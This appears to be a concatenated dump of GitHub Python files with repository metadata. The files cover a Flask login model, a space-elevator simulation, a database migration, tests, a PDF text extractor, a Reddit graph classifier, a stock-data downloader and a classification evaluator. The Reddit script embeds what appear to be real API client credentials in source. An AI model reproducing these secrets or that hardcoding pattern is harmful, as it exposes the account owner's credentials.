@staticmethod\n    def get_user_from_id(user_id):\n        from dataweb.user_list import fetch_user\n        user = fetch_user(property='id', value=user_id)\n        if user is not None:\n            return User(user)\n        else:\n            return None\n","repo_name":"calabozo/flask_login","sub_path":"dataweb/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19890084544","text":"import math\npi = math.pi\n\nimport matplotlib.pyplot as plt\n\nfrom material import *\nfrom elevator 
import *\n\nh_elev = 35786000*1.5\nw_max = 100000\nw_min = 10000\n\ndef quadratic_profile(h):\n    global h_elev\n    hmax = h_elev\n    x = hmax - h\n    y_coeff = ((w_max - w_min)/h_elev**2)\n    y = y_coeff * x**2 + w_min # 10km at tip, 100km at sea level\n    A = pi * y**2\n    return A\n\ndef linear_profile(h):\n    global h_elev\n    hmax = h_elev\n    x = hmax - h\n    y_coeff = (w_max - w_min)/h_elev\n    y = y_coeff * x + w_min # 10km at tip, 100km at sea level\n    A = pi * y**2\n    return A\n\ndef constant_profile(h):\n    y = w_min\n    A = pi * y**2\n    return A\n\ndef main():\n    SS = SS304L()\n    \n    # angular velocity of Earth is calculated with (2pi / sidereal day length)\n    earth = celestial_body(5.972 * 10**24, 6371000, 7.292*10**(-5))\n\n    # geostationary orbit for earth is 35786 km\n    # this lift reaches 1.5 times that height\n    Atlantic_Lift = elevator(earth, h_elev, quadratic_profile, SS)\n\n    hs = []\n    ys = []\n    stresses = []\n    gravitys = []\n    inertials = []\n    total_forces = []\n    total_accels = []\n    for h in range(0, int(h_elev), 100000):\n        hs.append(h/1000)\n        ys.append((Atlantic_Lift.A(h)/pi)**(0.5)/1000)\n        stresses.append(Atlantic_Lift.get_stress_at(h)/10**9)\n        gravitys.append(Atlantic_Lift.get_gravitational_pull(h-100000, h)/10**9)\n        inertials.append(Atlantic_Lift.get_inertial_pull(h-100000, h)/10**9)\n        total_forces.append((Atlantic_Lift.get_inertial_pull(h-100000, h) - Atlantic_Lift.get_gravitational_pull(h-100000, h))/10**9)\n        total_accels.append((Atlantic_Lift.get_inertial_pull(h-100000, h) - Atlantic_Lift.get_gravitational_pull(h-100000, h)) / Atlantic_Lift.get_mass_between(h-100000, h))\n\n    _, ax = plt.subplots()\n    plt.plot(ys, hs)\n    plt.grid()\n    plt.xlabel(\"Tower Radius (km)\")\n    plt.ylabel(\"Tower Height (km)\")\n    plt.show()\n\n    plt.plot(hs, stresses)\n    plt.grid()\n    plt.xlabel(\"Tower Position (km)\")\n    plt.ylabel(\"Stress (GPa)\")\n    plt.show()\n\n    plt.plot(hs, gravitys)\n    plt.grid()\n    plt.xlabel(\"Tower Position (km)\")\n    plt.ylabel(\"Gravity Force About Position (GN)\")\n    plt.show()\n\n    plt.plot(hs, inertials)\n    plt.grid()\n    plt.xlabel(\"Tower Position (km)\")\n    plt.ylabel(\"Inertia-induced Force About Position (GN)\")\n    plt.show()\n\n    plt.plot(hs, total_forces)\n    plt.grid()\n    plt.xlabel(\"Tower Position (km)\")\n    plt.ylabel(\"Net Force About Position (GN)\")\n    plt.show()\n\n    plt.plot(hs, total_accels)\n    plt.grid()\n    plt.xlabel(\"Tower Position (km)\")\n    plt.ylabel(\"Net Acceleration About Position (m/s^2)\")\n    plt.show()\n\nmain()\n","repo_name":"arda-guler/SpaceElevator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9274766237","text":"from alembic import op\n\n\nrevision = '2b5eb14b042e'\ndown_revision = '23f172a581d1'\n\n\ndef upgrade():\n    op.drop_constraint('issues_repo_id_fkey', 'issues', type_='foreignkey')\n    op.create_foreign_key(\n        'fk_issues_repo_id_repos',\n        'issues', 'repos',\n        ['repo_id'], ['github_repo_id'],\n    )\n    op.drop_constraint(\n        'pull_requests_repo_id_fkey', 'pull_requests', type_='foreignkey'\n    )\n    op.create_foreign_key(\n        'fk_pull_requests_repo_id_repos',\n        'pull_requests', 'repos',\n        ['repo_id'], ['github_repo_id'],\n    )\n\n\ndef downgrade():\n    op.drop_constraint(\n        'fk_pull_requests_repo_id_repos', 'pull_requests', type_='foreignkey'\n    )\n    op.create_foreign_key(\n        'pull_requests_repo_id_fkey',\n        'pull_requests', 'repos',\n        ['repo_id'], ['id'],\n    )\n    op.drop_constraint('fk_issues_repo_id_repos', 'issues', type_='foreignkey')\n    op.create_foreign_key(\n        
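# (editor note) recreate the pre-migration FK: issues.repo_id pointing back\n        # at repos.id under its original auto-generated constraint name\n        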
'issues_repo_id_fkey',\n        'issues', 'repos',\n        ['repo_id'], ['id'],\n    )\n","repo_name":"DataDog/gello","sub_path":"migrations/versions/2b5eb14b042e_update_foreign_key_constraints_on_pull_.py","file_name":"2b5eb14b042e_update_foreign_key_constraints_on_pull_.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"31541273519","text":"import unittest\nimport fwim\n\nclass TestBasicWordMatcher(unittest.TestCase):\n    def setUp(self):\n        self.matcher = fwim.BasicWordMatcher()\n\n    def test_big(self):\n        words = []\n        ifile = open('/usr/share/dict/words')\n        for w in ifile:\n            w = w.strip()\n            if not w.endswith(\"'s\") and len(w) > 2:\n                words.append(w)\n            if len(words) >= 1000:\n                break\n        ifile.close()\n        \n        for w in words:\n            self.matcher.add_word(w)\n        \n        for w in words[:50]:\n            (match, penalty) = self.matcher.find_closest(w)\n            self.assertEqual(match, w)\n        \nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"rickd/Find-What-I-Mean","sub_path":"fwim_test_slow.py","file_name":"fwim_test_slow.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70889201767","text":"from montag.domain.entities import Provider\nfrom montag.use_cases.fetch_playlists import FetchPlaylists\nfrom montag.use_cases.support import Failure, Success\nfrom tests import factory\n\n\ndef test_fetch_playlists(repos, spotify_repo):\n    expected_playlists = factory.playlists(2)\n    spotify_repo.find_playlists.return_value = expected_playlists\n\n    response = FetchPlaylists(repos).execute(Provider.SPOTIFY)\n\n    assert response == Success(expected_playlists)\n\n\ndef test_error_handling_with_unexpected_errors(repos, spotify_repo):\n    error = ValueError(\"some message\")\n    spotify_repo.find_playlists.side_effect = error\n\n    response = FetchPlaylists(repos).execute(Provider.SPOTIFY)\n\n    assert response == Failure(\"some message\", error)\n","repo_name":"eeng/montag","sub_path":"tests/use_cases/test_fetch_playlists.py","file_name":"test_fetch_playlists.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33529075922","text":"'''\r\nWrite a program that asks the user for their name in the console and for an\r\ninteger, then prints the user's name to the screen on separate lines as many\r\ntimes as the number entered.\r\n\r\n'''\r\nnombre = str(input(\"Enter your name: \"))\r\nveces = int(input(\"Enter an integer: \"))\r\nprint(veces*(nombre+\"\\n\")) # multiply (name + line break) by the number of lines wanted\r\n\r\n","repo_name":"Tavial/cursophyton","sub_path":"ALFdatosSimples/ejercicio04.py","file_name":"ejercicio04.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41774964221","text":"import subprocess\nimport os.path\n\nclass PdfToText:\n    def __init__(self, infilepath, pages, outdir):\n        \"\"\"\n        wrapper around 'pdftotext' to extract the text from the pdf\n        \"\"\"\n        self.infilepath = infilepath\n        self.pages = pages\n        self.outdir = outdir \n        self.cmd = \"pdftotext\"\n        if not os.path.exists(self.outdir):\n            os.makedirs(self.outdir)\n\n    def dumpPages(self): \n        \"\"\"\n        dumps the content of the pdf into a single file, to check whether there is a significant number of characters and so verify whether it's structured or not\n        \"\"\"\n        filename = os.path.split(self.infilepath)[1].split(\".\")[0] \n        self.dumpedTextFilepath = os.path.join(self.outdir, filename + \".txt\")\n        cmdOutput = subprocess.call([self.cmd, self.infilepath, self.dumpedTextFilepath])\n\n    def extractPage(self, page):\n        outputFileName = os.path.join(self.outdir, str(page) + \".txt\")\n        cmdOutput = subprocess.call([self.cmd, \"-f\", str(page), \"-l\", str(page), self.infilepath, outputFileName])\n\n    def extractPages(self):\n        \"\"\"\n        unlike dumpPages, it extracts the content of every page into its own file, and converts newlines to line breaks\n        \"\"\"\n        for page in range(1, self.pages+1):\n            self.extractPage(page)\n            outputFileName = os.path.join(self.outdir, str(page) + \".txt\")\n            with open(outputFileName, 'r') as infile:\n                content = infile.read() \n            with open(outputFileName, 'w') as outfile:\n                outfile.write(self.nl2br(content))\n\n    def nl2br(self, s):\n        return '<br />\\n'.join(s.split('\\n'))\n\n\n\n","repo_name":"anjesh/pdf-processor","sub_path":"pdftools/PdfToText.py","file_name":"PdfToText.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"74077023529","text":"import praw\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nfrom karateclub import Node2Vec\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import precision_score, recall_score, f1_score\r\nimport streamlit as st\r\n\r\nreddit = praw.Reddit(\r\n    client_id='aaqo7P5fUXCJ1vvEHr_zXQ',\r\n    client_secret='ATuvKXql-pzU6-7mqb-lqfuEs--J8w',\r\n    user_agent='Robert, Andrada, IC project 1.0'\r\n)\r\n\r\n# Define the subreddit and create the graph\r\nsubreddit_name = 'Romania'\r\n\r\n@st.cache_data()\r\ndef mainGraph():\r\n    \r\n    graph = nx.Graph()\r\n\r\n    subreddit = reddit.subreddit(subreddit_name)\r\n    for submission in subreddit.hot(limit=5): # Adjust the limit as per your needs\r\n        # Add submission as a node in the graph\r\n        graph.add_node(submission.id, text=submission.title, type='submission')\r\n        # Connect submission nodes with author nodes if author information is available\r\n        if submission.author is not None:\r\n            graph.add_edge(submission.id, submission.author.name, type='author')\r\n        # Collect comments and connect them to their parent submissions or authors\r\n        submission.comments.replace_more(limit=None)\r\n        for comment in submission.comments.list():\r\n            graph.add_node(comment.id, text=comment.body, type='comment')\r\n            # Connect comments with author nodes if author information is available\r\n            if comment.author is not None:\r\n                graph.add_edge(comment.id, comment.author.name, type='author')\r\n            if comment.parent_id.startswith('t3_'): # Parent is a submission\r\n                graph.add_edge(comment.id, comment.parent_id, type='comment_to_submission')\r\n            else: # Parent is another comment\r\n                graph.add_edge(comment.id, comment.parent_id[3:], type='comment_to_comment')\r\n\r\n    #graph = load('graph_cache.joblib') # can use this for cached graphs\r\n\r\n    # Create a new graph with relabeled nodes\r\n    relabeled_graph = nx.convert_node_labels_to_integers(graph, first_label=0)\r\n\r\n    # Create a Node2Vec model\r\n    model = Node2Vec(dimensions=128)\r\n\r\n    # Fit the model to the relabeled graph\r\n    model.fit(relabeled_graph)\r\n\r\n    # Get the computed node embeddings\r\n    node_embeddings = 
model.get_embedding()\r\n\r\n # Manually assign labels based on node type\r\n node_labels = {}\r\n for node in graph.nodes:\r\n node_type = graph.nodes[node].get('type')\r\n if node_type == 'comment':\r\n node_labels[node] = 'interaction'\r\n else:\r\n node_labels[node] = 'non_interaction'\r\n\r\n # Convert node labels to numerical values\r\n label_encoder = LabelEncoder()\r\n encoded_node_labels = label_encoder.fit_transform(list(node_labels.values()))\r\n\r\n scaler = StandardScaler()\r\n node_embeddings_scaled = scaler.fit_transform(node_embeddings)\r\n\r\n # Split the data into training and testing sets\r\n X_train_node, X_test_node, y_train, y_test = train_test_split(node_embeddings_scaled, encoded_node_labels, test_size=0.2, random_state=42)\r\n\r\n # Create and train the logistic regression model for nodes\r\n logreg_node = LogisticRegression(max_iter=500)\r\n logreg_node.fit(X_train_node, y_train)\r\n\r\n # Calculate accuracy\r\n accuracy = logreg_node.score(X_test_node, y_test)\r\n\r\n # Calculate precision\r\n precision = precision_score(y_test, logreg_node.predict(X_test_node))\r\n\r\n # Calculate recall\r\n recall = recall_score(y_test, logreg_node.predict(X_test_node))\r\n\r\n # Calculate F1 score\r\n f1 = f1_score(y_test, logreg_node.predict(X_test_node))\r\n\r\n print(\"Accuracy: \", accuracy)\r\n print(\"Precision:\", precision)\r\n print(\"Recall:\", recall)\r\n print(\"F1 Score:\", f1)\r\n\r\n return logreg_node\r\n\r\n@st.cache_data()\r\n# Create a function to create a graph from a post URL\r\ndef create_graph_from_post(url):\r\n graph = nx.Graph()\r\n submission = reddit.submission(url=url)\r\n # Add submission as a node in the graph\r\n graph.add_node(submission.id, text=submission.title, type='submission')\r\n # Connect submission nodes with author nodes if author information is available\r\n if submission.author is not None:\r\n graph.add_edge(submission.id, submission.author.name, type='author')\r\n # Collect comments and connect them to their parent submissions or authors\r\n submission.comments.replace_more(limit=None)\r\n for comment in submission.comments.list():\r\n graph.add_node(comment.id, text=comment.body, type='comment')\r\n # Connect comments with author nodes if author information is available\r\n if comment.author is not None:\r\n graph.add_edge(comment.id, comment.author.name, type='author')\r\n if comment.parent_id.startswith('t3_'): # Parent is a submission\r\n graph.add_edge(comment.id, comment.parent_id, type='comment_to_submission')\r\n else: # Parent is another comment\r\n graph.add_edge(comment.id, comment.parent_id[3:], type='comment_to_comment')\r\n # Reindex the nodes in ascending order\r\n reindexed_graph = nx.convert_node_labels_to_integers(graph, ordering='sorted', label_attribute='old_label')\r\n\r\n return reindexed_graph\r\n\r\ndef showGraph(graph):\r\n pos = nx.kamada_kawai_layout(graph)\r\n fig, ax = plt.subplots(figsize=(10, 10))\r\n nx.draw_networkx_nodes(graph, pos, ax=ax, node_size=100, node_color='blue')\r\n nx.draw_networkx_edges(graph, pos, ax=ax, edge_color='gray', alpha=0.5)\r\n ax.axis('off')\r\n\r\n return fig\r\n\r\ndef create_embeddings(url):\r\n\r\n graph=create_graph_from_post(url)\r\n model=Node2Vec(dimensions=128)\r\n model.fit(graph)\r\n node_embeddings=model.get_embedding()\r\n\r\n return node_embeddings \r\n\r\ndef interactions(url, logreg_node):\r\n # Gather Input Data\r\n #submission = reddit.submission(url)\r\n #text = submission.title + ' ' + submission.selftext\r\n\r\n label_encoder = LabelEncoder()\r\n 
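# (editor note) a fresh encoder is refit here with the same two classes used\r\n    # in training; sklearn's LabelEncoder sorts classes alphabetically, so the\r\n    # integer codes line up with the training-time encoding\r\n    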
label_encoder.fit(['non_interaction', 'interaction'])\r\n node_embeddings = create_embeddings(url)\r\n\r\n prediction_node = logreg_node.predict(node_embeddings)\r\n num_interactions_node = len(prediction_node[prediction_node == label_encoder.transform(['interaction'])])\r\n\r\n print(\"Number of interactions: \", num_interactions_node )\r\n\r\n return num_interactions_node","repo_name":"Robert-Dobrei/ML-on-graphs","sub_path":"Backend.py","file_name":"Backend.py","file_ext":"py","file_size_in_byte":6413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27103411113","text":"def convert_band_to_dict(band):\n band_data = {}\n band_data['name'] = band.name\n band_data['id'] = band.ma_id\n band_data['url'] = band.url\n band_data['country'] = band.country\n band_data['genre'] = band.genre\n band_data['status'] = band.status\n band_data['lyrical_themes'] = band.lyrical_themes\n band_data['formation_year'] = band.formation_year\n band_data['years_active'] = band.years_active\n band_data['location'] = band.location\n band_data['description'] = band.description\n band_data['similar_artists'] = []\n for similar_artist in band.similarartist_set.all():\n band_data['similar_artists'].append({\n 'id': similar_artist.ma_id,\n 'name': similar_artist.name,\n 'country': similar_artist.country,\n 'genre': similar_artist.genre,\n 'url': similar_artist.url\n })\n band_data['related_links'] = []\n for related_link in band.relatedlinks_set.all():\n band_data['related_links'].append({\n 'category': related_link.category,\n 'type': related_link.link_type,\n 'url': related_link.url\n })\n return band_data\n\ndef convert_release_to_dict(release):\n release_data = {}\n release_data['band'] = release.band.name\n release_data['band_id'] = release.band.ma_id\n release_data['band_url'] = release.band.url\n release_data['name'] = release.name\n release_data['notes'] = release.notes\n release_data['length'] = release.length\n release_data['release_id'] = release.release_id\n release_data['release_type'] = release.release_type\n release_data['release_year'] = release.release_year\n release_data['songs'] = []\n for song in release.song_set.all():\n release_data['songs'].append({\n 'name': song.name,\n 'track_number': song.track_number,\n 'length': song.length,\n 'lyrics': song.lyrics,\n })\n\n release_data['lineup'] = []\n # Releases only have one lineup? 
We should change our models.\n    for lineup in release.releaselineup_set.all():\n        for musician in lineup.releasemusician_set.all():\n            release_data['lineup'].append({\n                'name': musician.name,\n                'role': musician.role\n            })\n    return release_data\n\ndef convert_musician_set_to_dict(lineup):\n    lineup_data = {}\n    lineup_data['musicians'] = []\n    for musician in lineup.bandmusician_set.all():\n        lineup_data['musicians'].append({\n            'name': musician.name,\n            'role': musician.role\n        })\n    return lineup_data\n","repo_name":"tobocop2/MetalAPI","sub_path":"MetalAPI/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"19003562875","text":"from django.db import transaction\nfrom logistics.util import config\nfrom logistics_project.apps.malawi.handlers.abstract.base import RecordResponseHandler\nfrom logistics.models import StockRequest\nfrom logistics.decorators import logistics_contact_and_permission_required, managed_products_required\nfrom logistics.shortcuts import create_stock_report\n\n\nclass StockReportBaseHandler(RecordResponseHandler):\n    hsa = None\n    requests = []\n    \n    \n    def get_report_type(self):\n        raise NotImplementedError(\"This method must be overridden\")\n    \n    def send_responses(self):\n        raise NotImplementedError(\"This method must be overridden\")\n\n    @transaction.commit_on_success\n    @logistics_contact_and_permission_required(config.Operations.REPORT_STOCK)\n    @managed_products_required()\n    def handle(self, text):\n        \"\"\"\n        Check some preconditions, based on shared assumptions of these handlers.\n        Return true if there is a precondition that wasn't met. If all preconditions\n        are met, the variables for facility and name will be set.\n        \n        This method will manage some replies as well.\n        \"\"\"\n        # at some point we may want more granular permissions for these\n        # operations, but for now we just share the one\n        self.hsa = self.msg.logistics_contact\n        \n        stock_report = create_stock_report(self.get_report_type(), \n                                           self.hsa.supply_point,\n                                           text, \n                                           self.msg.logger_msg)\n        self.requests = StockRequest.create_from_report(stock_report, self.hsa)\n        self.send_responses(stock_report)","repo_name":"viyouen/logistics","sub_path":"logistics_project/apps/malawi/handlers/abstract/stockreport.py","file_name":"stockreport.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"42501035675","text":"import requests\nimport pandas as pd\nimport io\nimport yfinance as yf\nfrom dictmanip import loader, saver\nimport os\n\ndef main(symboldata, symbol):\n    # read the Symbols in\n\n    try:\n        # download the stock price\n        TICK = yf.Ticker(symbol).info\n        sharesOutstanding = TICK['sharesOutstanding']\n        df = pd.DataFrame.from_dict(TICK, orient='index').T\n        print(df.head())\n        # write this ticker's info into the data directory passed in as symboldata\n        out_path = os.path.join(symboldata, symbol+'.csv')\n        df.to_csv(out_path, mode='a', header=True)\n    except Exception:\n        print('Error {}'.format(symbol))\n\n    print('success')\n    return\n\n\n\n\n\nif __name__ == '__main__':\n\n    symbol = 'GME'\n    symboldir = symbol+'_data'\n    output_dir = 'symboldata' # this can be changed, but this is what I use.\n    path = os.path.join(output_dir, symboldir)\n    main(path, symbol)\n\n    ''' try:\n        # download the stock price\n        stock = []\n        stock = yf.download(i,start=start, end=end, progress=False)\n\n        # append the individual stock prices\n        if len(stock) == 0:\n            None\n        else:\n            stock['Name']=i\n            stock_final = 
stock_final.append(stock,sort=False)\n except Exception:\n None\n '''\n","repo_name":"pookiemaker/shorts","sub_path":"python/getTickerInfo.py","file_name":"getTickerInfo.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40785224445","text":"from day10.run_day_10 import (\n count_joltage_diffs,\n count_joltage_paths,\n make_joltage_chain,\n)\nimport pytest\n\n\n@pytest.fixture\ndef example_input():\n return [16, 10, 15, 5, 1, 11, 7, 19, 6, 12, 4]\n\n\n@pytest.fixture\ndef large_input():\n return [\n 28,\n 33,\n 18,\n 42,\n 31,\n 14,\n 46,\n 20,\n 48,\n 47,\n 24,\n 23,\n 49,\n 45,\n 19,\n 38,\n 39,\n 11,\n 1,\n 32,\n 25,\n 35,\n 8,\n 17,\n 7,\n 9,\n 4,\n 2,\n 34,\n 10,\n 3,\n ]\n\n\ndef test_make_joltage_chain(example_input):\n joltages = make_joltage_chain(example_input)\n\n expected = [0, 1, 4, 5, 6, 7, 10, 11, 12, 15, 16, 19, 22]\n\n assert expected == joltages\n\n\ndef test_count_diffs(example_input):\n joltages = make_joltage_chain(example_input)\n\n diff_counter = count_joltage_diffs(joltages)\n\n assert 7 == diff_counter[1]\n assert 5 == diff_counter[3]\n\n\ndef test_large_example(large_input):\n joltages = make_joltage_chain(large_input)\n diff_counter = count_joltage_diffs(joltages)\n\n assert 22 == diff_counter[1]\n assert 10 == diff_counter[3]\n\n\ndef test_small_path_counter(example_input):\n joltages = make_joltage_chain(example_input)\n\n assert 8 == count_joltage_paths(joltages)\n\n\ndef test_large_path_counter(large_input):\n joltages = make_joltage_chain(large_input)\n\n assert 19208 == count_joltage_paths(joltages)","repo_name":"cadolphs/advent_of_code_2020","sub_path":"day10/test_day_10.py","file_name":"test_day_10.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14607675164","text":"# -*- coding: utf-8 -*-\n\nimport csv\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import pickle\n\n\nclass event(object):\n id = \"\"\n name = \"\"\n precision = 0.0\n recall = 0.0\n f1Score = 0.0\n predictedPositives = 0\n realPositives = 0\n matched = 0\n\n def __init__(self, id, name):\n self.id = id\n self.name = name\n\n\nclass image(object):\n document_id = \"\"\n event_type = \"\"\n\n def __init__(self, document_id, event_type):\n self.document_id = document_id\n self.event_type = event_type\n\n\ndef initEvents(_events):\n eventsList = []\n i = 0\n for e in _events:\n eventsList.append(event(i, e))\n i += 1\n return eventsList\n\n\ndef getData(_fileName):\n with open(_fileName, 'rb') as f:\n itemList = []\n reader = csv.reader(f)\n for row in reader:\n splitted = str(row).strip('[ \\' ]').split(r' ') # \\t for tabs\n itemList.append(image(splitted[0], splitted[1]))\n return itemList\n\n\ndef countTrueImagesByEvent(_imgList, _event):\n cont = 0\n for image in _imgList:\n if image.event_type == _event:\n cont += 1\n return cont\n\n\ndef evaluate(_rList, _vList, _k):\n vListLength = len(_vList)\n if (_k == \"all\" or _k > vListLength):\n _k = vListLength\n\n averagePrecision = 0.0\n averageRecall = 0.0\n averageF1Score = 0.0\n eventsCount = len(eventsList)\n\n for event in eventsList:\n print(\"Calculating for event '\" + event.name + \"'\")\n predictedPositives = countTrueImagesByEvent(_vList, event.name)\n realPositives = countTrueImagesByEvent(_rList, event.name)\n cont = 0\n matched = 0\n\n for vImage in _vList:\n 
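# (editor note) walk the predictions in ranked order, stop after the first\r\n            # _k items, and count exact document-id/event-type matches against\r\n            # the ground-truth list\r\n            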
if cont >= _k:\r\n                break\r\n            cont += 1\r\n            if vImage.event_type == event.name:\r\n                for rImage in _rList:\r\n                    if rImage.document_id == vImage.document_id:\r\n                        if rImage.event_type == vImage.event_type:\r\n                            matched += 1\r\n                        break\r\n\r\n        event.predictedPositives = predictedPositives\r\n        event.realPositives = realPositives\r\n        event.matched = matched\r\n\r\n        #Precision\r\n        if predictedPositives == 0:\r\n            event.precision = 0\r\n        else:\r\n            event.precision = ((float(matched) / float(predictedPositives)))\r\n        averagePrecision += event.precision\r\n\r\n        #Recall\r\n        if realPositives == 0:\r\n            event.recall = 0\r\n        else:\r\n            event.recall = ((float(matched) / float(realPositives)))\r\n        averageRecall += event.recall\r\n\r\n        #F1 Score\r\n        if (event.precision + event.recall) == 0:\r\n            event.f1Score = 0\r\n        else:\r\n            event.f1Score = ((2.0 * ((event.precision * event.recall) / (event.precision + event.recall))))\r\n        averageF1Score += event.f1Score\r\n\r\n        # print(\"Predicted Positives: \" + str(predictedPositives))\r\n        # print(\"Real Positives: \" + str(realPositives))\r\n        # print(\"Matched: \" + str(matched))\r\n\r\n    averagePrecision /= eventsCount\r\n    averageRecall /= eventsCount\r\n    averageF1Score /= eventsCount\r\n\r\n    return [averagePrecision, averageRecall, averageF1Score]\r\n\r\n\r\ndef calcAccuracy(_rList, _vList, _k):\r\n    hits = 0\r\n    cont = 0\r\n\r\n    if _k == \"all\":\r\n        _k = len(_vList)\r\n\r\n    for vImage in _vList:\r\n        if cont >= _k:\r\n            break\r\n        cont += 1\r\n        for rImage in _rList:\r\n            if rImage.document_id == vImage.document_id:\r\n                if rImage.event_type == vImage.event_type:\r\n                    hits += 1\r\n                break\r\n\r\n    return float(hits) / float(len(_vList))\r\n\r\n\r\ndef calcMistakesAndMatches(_rList, _vList, _k):\r\n    mistakes = 0\r\n    matches = 0\r\n    cont = 0\r\n\r\n    if _k == \"all\":\r\n        _k = len(_vList)\r\n\r\n    for vImage in _vList:\r\n        if cont >= _k:\r\n            break\r\n        cont += 1\r\n        for rImage in _rList:\r\n            if rImage.document_id == vImage.document_id:\r\n                if rImage.event_type != vImage.event_type:\r\n                    mistakes += 1\r\n                else:\r\n                    matches += 1\r\n                break\r\n    return [mistakes, matches]\r\n\r\n\r\ndef writeResults(_fileName):\r\n    oFile = open(_fileName, 'wb')\r\n    wr = csv.writer(oFile)\r\n\r\n    wr.writerow([\"Precision: \" + (\"%.4f\" % results[0])])\r\n    wr.writerow([\"Recall: \" + (\"%.4f\" % results[1])])\r\n    wr.writerow([\"F1 Score: \" + (\"%.4f\" % results[2])])\r\n    wr.writerow([\"Accuracy: \" + (\"%.4f\" % results[3])])\r\n    wr.writerow([\"Mistakes: \" + (str(results[4]))])\r\n    wr.writerow([\"Matches: \" + (str(results[5]))])\r\n\r\n    for event in eventsList:\r\n        wr.writerow([\r\n            str(event.id)\r\n            + \" \" + event.name\r\n            + \" \" + (\"%.4f\" % event.precision)\r\n            + \" \" + (\"%.4f\" % event.recall)\r\n            + \" \" + (\"%.4f\" % event.f1Score)\r\n        ])\r\n\r\n\r\ndef printResults():\r\n    print(\"GLOBAL RESULTS\")\r\n    print(\"Precision: \" + (\"%.4f\" % results[0]))\r\n    print(\"Recall: \" + (\"%.4f\" % results[1]))\r\n    print(\"F1 Score: \" + (\"%.4f\" % results[2]))\r\n    print(\"Accuracy: \" + (\"%.4f\" % results[3]))\r\n    print(\"Mistakes: \" + (str(results[4])))\r\n    print(\"Matches: \" + (str(results[5])))\r\n\r\n    print(\"\\n\")\r\n    print(\"RESULTS FOR EACH EVENT\")\r\n    print(\"EVENT ID \" \r\n          + \"EVENT NAME \"\r\n          + \"PRECISION \"\r\n          + \"RECALL \"\r\n          + \"F1 SCORE \"\r\n          + \"PRED. POS. \"\r\n          + \"REAL POS. 
\"\n + \"MATCHED \"\n + \"MISTAKES\")\n\n for event in eventsList:\n nameRestChars = 18 - len(event.name)\n realPosRestChars = 18 - len(str(event.predictedPositives))\n matchedRestChars = 18 - len(str(event.realPositives))\n mistakesRestChars = 18 - len(str(event.matched))\n nameSpace = \"\"\n realPosSpace = \"\"\n matchedSpace = \"\"\n mistakesSpace = \"\"\n for i in range(0, nameRestChars):\n nameSpace += \" \"\n for i in range(0, realPosRestChars):\n realPosSpace += \" \"\n for i in range(0, matchedRestChars):\n matchedSpace += \" \"\n for i in range(0, mistakesRestChars):\n mistakesSpace += \" \"\n print(str(event.id)\n + \" \" + event.name\n + nameSpace + (\"%.4f\" % event.precision)\n + \" \" + (\"%.4f\" % event.recall)\n + \" \" + (\"%.4f\" % event.f1Score)\n + \" \" + (str(event.predictedPositives))\n + realPosSpace + (str(event.realPositives))\n + matchedSpace + (str(event.matched))\n + mistakesSpace + (str(event.predictedPositives - event.matched))\n )\n\n\ndef printGraphs():\n y_pos = np.arange(len(eventsNames))\n precision = []\n recall = []\n mistakes = []\n for event in eventsList:\n precision.append(event.precision)\n recall.append(event.recall)\n mistakes.append(event.predictedPositives - event.matched)\n \n #Precision\n plt.barh(y_pos, precision, align='center', color=\"#1abc9c\")\n plt.yticks(y_pos, eventsNames)\n plt.xlabel('Precision')\n plt.title('Precision for each class')\n plt.show()\n\n #Recall\n plt.barh(y_pos, recall, align='center', color=\"#9b59b6\")\n plt.yticks(y_pos, eventsNames)\n plt.xlabel('Recall')\n plt.title('Recall for each class')\n plt.show()\n\n #Mistakes\n plt.barh(y_pos, mistakes, align='center', color=\"#e74c3c\")\n plt.yticks(y_pos, eventsNames)\n plt.xlabel('Mistakes')\n plt.title('Mistakes for each class')\n plt.show()\n\n\n\n\n\n######################\n#### MAIN PROGRAM ####\n######################\n\n# FILES VARS\nreferenceFileName = \"groundtruth/groundtruth_1.csv\" # \"groundtruth/evaluable_groundtruth.csv\" # Arxiu de la solució per comparar els resultats.\nevaluableFileName = \"classified.txt\" # Arxiu a evaluar.\nresultsFileName = \"results.txt\" # Arxiu on escriurem els resultats.\n\n# Setting the K value\nk = \"all\" # Set k to \"all\" if we want to analyse all the values\n\neventsNames = [\n \"concert\",\n \"conference\",\n \"exhibition\",\n \"fashion\",\n \"other\",\n \"protest\",\n \"sports\",\n \"theater_dance\",\n \"non_event\"\n]\n\n#Init events\nprint(\"Initializing the events\")\neventsList = initEvents(eventsNames)\n\n#Load the reference and 